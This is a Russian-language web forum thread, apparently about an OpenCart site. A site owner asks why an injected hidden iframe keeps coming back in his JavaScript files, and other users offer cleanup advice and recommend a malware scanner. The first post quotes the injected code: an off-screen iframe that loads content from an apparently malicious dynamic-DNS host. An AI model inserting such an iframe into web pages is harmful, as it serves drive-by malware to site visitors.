Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Вредоносное ПО на сайте


svan

Recommended Posts

Три дня назад по бану на Google обнаружил вирус на сайте. Вот такая дрянь подставляется во все файлы из папки javascript:

<iframe width="55" height="55" style="width:100px;высота:100px;position:absolute;слева:-100px;top:0;" src="http://rxrla.ddns.name/46b2e4f7ff73218ac85.res?11"></iframe>

И url постоянно меняется. Чего только не пробовал и сайт переустанавливал из бекап и из "коробки" результат один - как только сайт начинает работать этот долбаный код опять появляется в файлах js. Базу данных очищал полностью, пароли менял, комп антивирусом проверял.

Откуда он лезет?

Вот сканер http://sitecheck.sucuri.net/scanner/ показывает, как только все файлы в javascript меняешь - все чисто, несколько кликов на сайте - опять вирусняк показывает.

Версия ОС 1.5.3.1

Надіслати
Поділитися на інших сайтах


AI-Болит v.20121221 — удаленькая искалка вредоносного ПО на хостинге.

Всем доброго времени!

В продолжение и по причине того,что сам зачастую сталкиваюсь (думаю,что и многие из вас,сами того не подозревая..исключая понятно господ "в теме")

с вредоносными и хакерскими скриптами,которые,как правило "вшиты" не только во фришные..но и к сожалению и в платные расширения и модули,шаблоны..огворюсь,совершенно не обязательно приобретенными непосредственно здесь (!) тем не менее,более чем комфортно чувствующими себя и работающими "на хозяина" на вашем же хосте,рекомендую воспользоваться (!! речи не может быть о рекламе) - AI-Bolit - это уникальный бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге.http://www.revisium.com/ai/

Надіслати
Поділитися на інших сайтах


  • 3 weeks later...
444 на файл пароль на фтп меняли? на домене есть phpmyadmin, какая версия, какой там метод авторизации?
Вообще на какие файлы надо оставлять право на запись - по идее это выход.

Через базы вообще возможно заражение сайта? Если да, то что там искать?

Надіслати
Поділитися на інших сайтах


сначала разберитесь с шаблоном. Откуда взяли, что как и почему. А то сколько прав не выставляй, а функционал вируса будет сидеть в шаблоне или движке.

Надіслати
Поділитися на інших сайтах

Помогите! В админку влез,не знаю что,точнее в модули,реклама,два модуля подсвечивает синим,нажимаешь,выходит реклама тотализатора. Как это все можно убрать.Сканировал все на вирусы,пишет вирусов нет....,я в замешательстве...

Надіслати
Поділитися на інших сайтах


Помогите! В админку влез,не знаю что,точнее в модули,реклама,два модуля подсвечивает синим,нажимаешь,выходит реклама тотализатора. Как это все можно убрать.Сканировал все на вирусы,пишет вирусов нет....,я в замешательстве...

Что можно сказать, меняй хостера, меняй пароли...

Заменяй все что можно заменить чистым кодом или сравнивай изменения

Чисти свой ПК

Надіслати
Поділитися на інших сайтах


  • 1 month later...

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.